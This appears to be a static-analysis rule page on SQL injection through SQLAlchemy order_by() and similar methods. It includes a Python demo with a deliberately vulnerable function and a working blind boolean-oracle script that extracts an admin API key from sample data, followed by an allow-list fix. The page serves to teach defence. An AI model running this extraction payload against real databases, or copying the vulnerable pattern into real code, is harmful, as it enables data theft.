Language: python
Severity: medium
CWE: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
OWASP: A01:2017 - Injection
Confidence Level: Medium
Impact Level: High
Likelihood Level: Low

Description

User input is passed into SQLAlchemy query-construction methods such as group_by(), order_by(), distinct(), having(), or filter() as raw SQL text, typically wrapped in text() or assembled with string formatting, instead of as a bound parameter or a column object. Because the value becomes part of the statement text, an attacker controls part of the query and can change its logic. Two points matter in practice: recent SQLAlchemy versions reject a bare string in these methods, so the flagged code almost always builds a text() expression from the input; and bound parameters only protect values, so identifiers such as the column named in an ORDER BY or GROUP BY cannot be bound at all and must be mapped through an allow-list of permitted columns.
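The following added example is not code from the original page. It assumes SQLAlchemy 1.4 or newer and an in-memory SQLite database with constructed sample rows; the table, the users, and the admin api_key value are invented for the demonstration. It shows a user-controlled ORDER BY expression spliced in through text(), how a sort-only injection point still yields a boolean oracle that leaks the admin key one character at a time, and the hardened version that resolves the sort key through an allow-list of column objects and binds filter values:

```python
"""Added example (not from the original page): SQLAlchemy ORDER BY injection.

Assumes SQLAlchemy 1.4+ and uses an in-memory SQLite database. All table
names, users and key values below are constructed for the demo.
"""
from sqlalchemy import (Column, Integer, MetaData, String, Table,
                        create_engine, insert, select, text)

metadata = MetaData()
users = Table(
    "users", metadata,
    Column("id", Integer, primary_key=True),
    Column("username", String(64), nullable=False),
    Column("role", String(16), nullable=False),
    Column("api_key", String(64), nullable=False),
)

# Constructed sample data; the admin key is the secret the attacker extracts.
SAMPLE_ROWS = [
    {"id": 1, "username": "alice", "role": "admin", "api_key": "4f9c"},
    {"id": 2, "username": "bob", "role": "user", "api_key": "a1b2"},
    {"id": 3, "username": "carol", "role": "user", "api_key": "77de"},
]


def make_engine():
    engine = create_engine("sqlite://")
    metadata.create_all(engine)
    with engine.begin() as conn:  # transaction commits on exit
        conn.execute(insert(users), SAMPLE_ROWS)
    return engine


# --- vulnerable: the sort expression is spliced in verbatim via text() -------
def list_users_vulnerable(engine, sort_expr):
    """`sort_expr` is whatever the request sent, e.g. "username"."""
    stmt = select(users.c.username, users.c.role).order_by(text(sort_expr))
    with engine.connect() as conn:
        return [tuple(r) for r in conn.execute(stmt)]


def oracle(engine, condition):
    """Blind boolean oracle: the row order flips depending on `condition`.

    ORDER BY id puts alice first; ORDER BY -id puts carol first, so the first
    row tells the attacker whether the condition held.
    """
    payload = f"CASE WHEN ({condition}) THEN id ELSE -id END"
    baseline = list_users_vulnerable(engine, "id")[0]
    return list_users_vulnerable(engine, payload)[0] == baseline


def extract_admin_key(engine, length=4, alphabet="0123456789abcdef"):
    """Recover the admin api_key one character at a time through ORDER BY."""
    known = ""
    for _ in range(length):
        for ch in alphabet:
            cond = ("(SELECT api_key FROM users WHERE role='admin') "
                    f"LIKE '{known + ch}%'")
            if oracle(engine, cond):
                known += ch
                break
        else:
            raise RuntimeError("no candidate matched; alphabet too small?")
    return known


# --- hardened: input picks from an allow-list and never enters the SQL text --
SORTABLE = {"username": users.c.username, "role": users.c.role}


def is_sortable(sort_key):
    """Validation step: only keys present in the allow-list are accepted."""
    return sort_key in SORTABLE


def list_users_safe(engine, sort_key="username", descending=False, role=None):
    if not is_sortable(sort_key):
        raise ValueError(f"unsupported sort key: {sort_key!r}")
    col = SORTABLE[sort_key]  # a Column object, not user text
    stmt = select(users.c.username, users.c.role)
    if role is not None:
        stmt = stmt.where(users.c.role == role)  # value goes in as a bind param
    stmt = stmt.order_by(col.desc() if descending else col.asc())
    with engine.connect() as conn:
        return [tuple(r) for r in conn.execute(stmt)]


if __name__ == "__main__":
    eng = make_engine()
    print("leaked admin key:", extract_admin_key(eng))
    print("safe listing:", list_users_safe(eng, "username", descending=True))
```

The hardened version makes the distinction explicit: the sort key is a lookup into a dictionary of Column objects, so an arbitrary string can never reach the statement, while the role filter is a comparison against a Column, which SQLAlchemy emits as a bound parameter. The same allow-list approach applies to group_by(), having() and distinct(): anything that names a column or expression must be chosen by the application, not typed by the user.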

Impact

Exploiting this vulnerability lets an attacker run arbitrary SQL against the application's database, potentially reading, altering, or deleting sensitive data. Even an injection point that only controls sorting or grouping is enough to act as a boolean oracle and extract data from other tables one value at a time. The result can be a data breach, data loss, or unauthorized access to application functionality.